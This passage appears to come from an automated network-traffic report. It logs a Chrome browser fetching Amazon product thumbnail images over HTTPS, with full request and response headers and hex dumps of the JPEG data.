                                                                                                                                                                                                                                                                Data Ascii: dICe=gx|#Wqd8zf#4g>TKPcv/%_z9|Ua'][*eJx6U6XFT<5"&'cEhHbY8FQTet5Hn'TC\UAv`@ic:H:"aDwaojW9w5*a)^b?
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 47 73 7f 7a 64 59 72 04 de 3e e5 a8 95 b0 0a 18 57 35 b1 90 4e 6b 55 96 ac c2 2c 59 63 3a b2 be 6e e2 c9 88 70 b8 7e 8f 1c 95 cf 83 c9 55 f3 e2 ae ef 97 23 93 ce b0 51 a2 f9 b1 91 1b e9 0a 39 29 0a 43 e1 23 16 7f 0a f4 6d 46 b7 85 ad f1 19 08 8c e7 27 29 1e c5 6b 80 c6 27 f6 5b 76 f0 fa d0 9e cf b6 8b 59 e2 34 69 7d bf 5a 3e 0b d8 d7 bd 48 de 01 fb 4f 15 73 9c c4 73 dd c2 ab fd 9b a1 05 10 e9 e3 c6 2d fc 3f 4f 50 47 cd d5 eb d8 3c 94 90 39 31 a5 30 a1 c8 a5 12 7d 6d 1c 73 39 5c de 9d 84 12 65 f7 28 c6 24 18 fe 2c 8e 83 e6 33 4f 2a bb 32 47 88 4f e7 a7 19 4d 3d 72 65 73 4f 05 db 95 79 2c 79 5f b0 aa 1f 77 57 cc 95 5e f6 71 99 e7 91 71 8b e0 96 f5 f1 e5 f0 65 13 09 53 2f f9 95 75 8d 7e ab 62 e5 2b e4 63 93 1e 21 39 79 2b 12 ae fc e4 8a b2 72 40 ce 90 e4 67
                                                                                                                                                                                                                                                                Data Ascii: GszdYr>W5NkU,Yc:np~U#Q9)C#mF')k'[vY4i}Z>HOss-?OPG<910}ms9\e($,3O*2GOM=resOy,y_wW^qqeS/u~b+c!9y+r@g
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 44 fb 7b 4e 41 9b e8 f1 52 ef 04 a0 fe c3 91 db 65 04 df 30 23 f7 0c 7e 92 e7 10 c7 6f 49 cf b2 a4 87 3a 42 fb 44 b2 d3 7c 29 85 70 e4 e1 60 60 bd 7c f2 e8 d6 0d 60 3e 64 19 13 e0 b5 7c 10 99 76 94 64 58 9a 1a 77 2d 2e 69 87 e2 eb 80 4f b0 07 9d 12 c0 f1 ff 00 53 e1 6a 26 75 58 ce 08 59 7d 80 9b ee 6d 7e b7 6a 58 7e a0 d9 37 5c d7 7b 29 91 e4 76 59 3d dc fb db d2 f3 ad ac 15 bc fd bc 9e 34 e6 82 f9 6c f2 8c 9c 31 2c e3 b7 8a 25 15 0c dd 14 d3 0b 06 2b 4b 82 46 12 2f f6 87 b0 d2 3d 0d 88 51 00 40 a9 b1 23 37 ba 0e 6d e5 11 96 de 90 d0 71 c2 33 08 a7 6e ee 29 4f 97 1b 98 73 13 8a ca 51 9c ae 7c c1 cb 71 08 ce 00 8c 7c 3b f8 1b 06 3d af 48 43 c4 80 49 30 f9 9b 9c 63 dc 5c 22 cb 21 88 e4 95 37 77 3e 64 eb f5 9e d8 e1 50 b2 34 68 89 ba 3c 4e 25 91 ca 8c 04 79
                                                                                                                                                                                                                                                                Data Ascii: D{NARe0#~oI:BD|)p``|`>d|vdXw-.iOSj&uXY}m~jX~7\{)vY=4l1,%+KF/=Q@#7mq3n)OsQ|q|;=HCI0c\"!7w>dP4h<N%y
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: ac 2b 7a d6 a8 b9 6d df ef 73 b1 52 f5 31 65 02 60 f9 d1 49 c5 ba a6 67 64 8a fa e9 0e e6 74 fb c8 c4 19 65 db 5c f7 73 07 a4 83 15 9c 31 99 9a 6a 1e 3f 85 c7 6b a7 39 d2 ee 3e d2 ae a6 69 d6 d6 65 8d 89 86 82 49 86 24 82 0f 4c 34 c6 bb 50 52 e9 26 da 4a af 65 72 03 81 9a 93 a2 c4 c2 e8 bb e5 75 b7 74 89 1c 8c 11 c2 27 59 b1 bb c6 bb d8 9e 0a 90 72 2b 7a e5 4e 14 2b 3f ba 36 5b 90 05 ac e7 03 ad df bb c2 1e 79 56 64 7a 4b 7a d6 c9 0f db 00 59 15 3c 94 de 19 d1 8f bf 6b 28 33 5a 7e ff 00 8c 1d 63 4e 94 56 f5 68 6c ec e3 c3 2d cc 95 44 5b 3a e8 4e 24 a2 58 42 e6 d7 5a 47 c8 f3 66 44 af 9c 83 32 57 55 4b e6 92 58 a8 69 a5 d9 55 8d f2 94 53 27 49 cb 2b 6a ae 72 17 5c b6 af aa 8e 86 18 a6 4e ba bd 3b 24 da 4d 3d 89 be ad 83 3e 98 63 d6 93 33 4c 42 78 61 9c f0
                                                                                                                                                                                                                                                                Data Ascii: +zmsR1e`Igdte\s1j?k9>ieI$L4PR&Jerut'Yr+zN+?6[yVdzKzY<k(3Z~cNVhl-D[:N$XBZGfD2WUKXiUS'I+jr\N;$M=>c3LBxa
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: fb 86 3c 1e 55 60 d7 de 65 73 d7 69 02 43 80 c1 5f 51 5a ad d9 c8 ad 55 6b bc 15 be 0a 9f a3 9a 8a e5 46 b7 c5 5d e0 89 1c 48 00 04 29 ea 13 51 bf 25 e4 7e 9e c8 fe 1e 69 bc f6 fe 8f a3 8f d4 59 03 c3 cd 0f 9e ef 97 28 8b c6 00 ca 6a 78 85 78 5f fa 1e d7 23 a0 a3 78 87 73 71 1a b1 e7 45 50 b1 15 1c 88 e6 ae f4 5f 52 fd 2c 5e 2f 00 0d 29 c9 e2 65 e1 67 cb 24 0d 93 1c d1 df ea 2b 55 36 23 1c 22 3c 6f 4d cf 1a aa 39 3e 86 a8 dd df e4 79 bd a5 5e 39 2c ec 8b 8b 44 22 ca 6e 8e e4 8f c8 b0 a8 7d 49 94 d3 ea 1c e8 b3 1f a8 a5 28 30 7c 9c c0 23 82 61 c4 22 8c b8 0e 1f 95 e7 b0 67 4d 8d 99 1e bd b0 4a 82 73 3f 02 79 a7 ff 00 61 3f 6d 77 93 36 bb 0a a9 74 49 84 8c 64 b0 03 1e 6c 3f 4d 72 7c bb 1c ae c8 59 9f 49 82 db 0e 6e e8 b6 53 35 3b 47 e7 43 3c eb 75 c8 68 25
                                                                                                                                                                                                                                                                Data Ascii: <U`esiC_QZUkF]H)Q%~iY(jxx_#xsqEP_R,^/)eg$+U6#"<oM9>y^9,D"n}I(0|#a"gMJs?ya?mw6tIdl?Mr|YInS5;GC<uh%
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC1378INData Raw: 32 49 c1 58 66 7b 35 d3 a3 98 db 68 bd 8c 69 fa 7f 4e 20 bd bc ea de 70 25 8b ca 35 53 bb 63 49 bf c5 23 9f 7a 1a ba 15 b5 47 6e b1 8c d9 90 a5 85 ad 91 1f 24 d1 14 a6 64 bb fc 26 f8 f5 52 60 b1 e5 6c 4d 18 cc ed b2 da 29 cd ba 27 53 36 a4 ad 1f 5d f2 35 ae 7b 9a c6 a7 13 9d e0 d4 ae 86 90 62 0a 3a 7b 49 e2 45 fa 39 25 7f 28 a9 38 69 e6 1b c0 df 2d fe 96 1f 22 ce a1 e5 b3 ee da e8 30 5f 19 43 51 b6 7d 87 0b 38 c7 df 4c e9 09 0c cd 28 cd 12 64 0c 12 6c 6d 3d 95 83 49 b9 49 4f 20 8a 18 d6 41 f2 7b b4 8e 8a 91 f3 6e 42 3b da 4f c0 1d e7 ff 00 3d 7e da 83 83 13 38 c7 e0 d2 32 c9 2b 9d 0e 40 8e b2 41 a1 19 0c 50 b6 3c 6d 42 2c 70 33 7f 00 31 ad 08 a0 aa 96 cb 0b c9 e4 c9 25 31 dc 48 14 44 44 dc 9e 08 9e a4 f9 35 23 4b 0d 9e d9 57 cf 1d d3 6b 12 10 39 4a 3d b2
                                                                                                                                                                                                                                                                Data Ascii: 2IXf{5hiN p%5ScI#zGn$d&R`lM)'S6]5{b:{IE9%(8i-"0_CQ}8L(dlm=IIO A{nB;O=~82+@AP<mB,p31%1HDD5#KWk9J=


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                97192.168.2.44997218.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC611OUTGET /images/I/31ulQWhB89L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4236
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: f768947e-62df-405c-813c-855e0567effe
                                                                                                                                                                                                                                                                Date: Tue, 06 Aug 2024 13:27:21 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 12 Sep 2023 23:26:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-713,/images/I/31ulQWhB89L
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 13:27:21 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-713 /images/I/31ulQWhB89L
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 0f9c1f26e53d95127196e190a08a56b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 442521
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: GmUpI6qtHd-tae6okESEJv9IB-pvEUqqBXt7zl6cXW69NTrxyIvTtQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC4236INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 06 07 03 04 05 01 02 08 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 96 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                98192.168.2.44997418.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:35 UTC611OUTGET /images/I/41A1Lpkr9HL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 4959
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: ca32fe45-84fe-4ea5-a75a-210e51420983
                                                                                                                                                                                                                                                                Date: Tue, 06 Aug 2024 12:08:11 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 19:56:30 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-675,/images/I/41A1Lpkr9HL
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 12:08:11 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-675 /images/I/41A1Lpkr9HL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 1dd177f0f1668dc5abba6f90eb9da04c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 155117
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: _gAabHghGz0cUa3phSCh_GdI8mkRf_9cBQMwZEn9yAbRkPAEWAJBUQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC4959INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 03 06 07 09 02 04 05 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3`


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                99192.168.2.44997618.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC611OUTGET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 3410
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 880b28ce-4424-43e7-bde3-7460a9eb98ed
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:36 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 12 Mar 2024 07:22:19 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-720,/images/I/31Id2i6D-rL
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 13:23:36 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-720 /images/I/31Id2i6D-rL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 327603281c948cac70b552029adb2e26.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 6jsbDKCW4HZ_YUAVpAhZHXkbuYkdwwV6Diax1FEKfZyDldqBrXI6Gw==
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC3410INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 02 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                100192.168.2.449979151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC378OUTGET /images/I/31ulQWhB89L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC675INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4236
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f768947e-62df-405c-813c-855e0567effe
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 12 Sep 2023 23:26:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 13:27:21 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:36 GMT
                                                                                                                                                                                                                                                                Age: 518175
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100093-IAD, cache-ewr18146-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 06 07 03 04 05 01 02 08 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 96 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: 66 29 bd 1d 3a 35 a3 59 88 a6 58 0f 8a 1c f9 7a 87 0d ee d1 aa 9e c3 02 14 ed a5 fd 1d 12 95 d5 4f 63 13 75 80 f8 a1 cf 97 a8 70 de ed 1a 8d b2 8a 9b a0 4e d9 a2 67 0e ba d1 c8 82 02 9d 59 0d 2d ed 11 6b 61 75 80 f8 a1 cf 97 a8 70 de ed 1a 01 ce 9d 77 51 16 6d ea f0 83 a6 80 07 a3 ab 0d ec ea 81 67 10 ac 07 c5 0e 7c bd 43 86 f7 68 d5 16 d5 56 06 50 3e 87 71 76 e0 75 3f 45 87 76 d6 03 e2 87 3e 5e a3 c3 77 b4 6b 0f f1 ab ab 61 a5 da 46 8c b3 e0 75 68 f2 67 55 a3 db 00 15 80 f8 a1 cf 9b db 4b f0 d9 1d 40 4c b0 99 75 d7 8d 93 b6 7e cf 93 c0 f9 21 2c d6 6b 34 44 a2 0d f3 d4 ac d8 6a f1 9c 85 83 c4 f1 56 89 9f 9c ed 9a db 21 e9 f2 5f 25 f2 4f a9 d4 b8 7c 9a de 48 76 ef a2 86 f1 36 4e 35 2f 0a d9 be b6 6f a3 a7 78 fa 8c 37 9b d9 83 0c 39 49 8e cf fc 03 ff c4 00
                                                                                                                                                                                                                                                                Data Ascii: f):5YXzOcupNgY-kaupwQmg|ChVP>qvu?Ev>^wkaFuhgUK@Lu~!,k4DjV!_%O|Hv6N5/ox79I
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC1378INData Raw: 37 0b 84 35 29 66 85 e7 bb 12 9d 5e 88 58 ba 11 ec 51 1f 81 8e 88 f3 a6 a6 7f 5b ae de cd 1c bb fd e1 56 42 4f c4 cb 52 5f d2 ec be 11 07 0d 04 87 32 5c f6 76 8f 8c a1 b7 2f 75 f6 78 72 ef 77 85 3b b9 a4 b9 31 84 c9 2b 62 bf 8c 7f 00 84 ad 8e 8e 5d f6 f1 b3 bb 22 8e 4a 10 66 83 3d 5c ac 6f 57 5f 3a f5 72 b6 ff 00 b8 d8 5d 1c 2a 08 38 0b 81 a4 c5 89 7e 93 3f a9 d7 cc ea 72 35 86 ef 78 76 36 6a fa 90 36 ae 19 62 24 54 38 32 a2 a0 b2 51 e5 fd 23 3f ad d7 cc ea 72 40 1a 99 be 44 15 dc bf 84 81 4a c6 38 89 06 a1 e3 8f 74 d4 cf ea 75 f3 3a 9c bb 3d cc 7d 83 49 1b f8 08 1f 21 f8 cc 0e 53 3f a9 d7 cc 34 7c bb 3d cc d9 6e 93 cb 74 1e 50 f8 14 52 88 ec 09 0c cf ea 75 f3 0f 47 cb b3 dc c4 df 74 f0 f8 a7 61 3c 0c 40 3f 6c 38 2f cb 15 a6 7f 53 af 98 6a e5 d9 ee 66 32
                                                                                                                                                                                                                                                                Data Ascii: 75)f^XQ[VBOR_2\v/uxrw;1+b]"Jf=\oW_:r]*8~?r5xv6j6b$T82Q#?r@DJ8tu:=}I!S?4|=ntPRuGta<@?l8/Sjf2
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC102INData Raw: 4e a3 80 00 28 36 ff 00 c0 3f ff c4 00 19 11 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 01 30 31 40 50 70 ff da 00 08 01 02 01 09 3f 00 a5 10 02 cf 87 ff 00 ff c4 00 1a 11 01 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 01 60 00 30 31 40 50 ff da 00 08 01 03 01 09 3f 00 e2 ba 0d ec 43 1a 60 5f ff d9
                                                                                                                                                                                                                                                                Data Ascii: N(6?01@Pp?`01@P?C`_


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                101192.168.2.44997818.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:36 UTC611OUTGET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
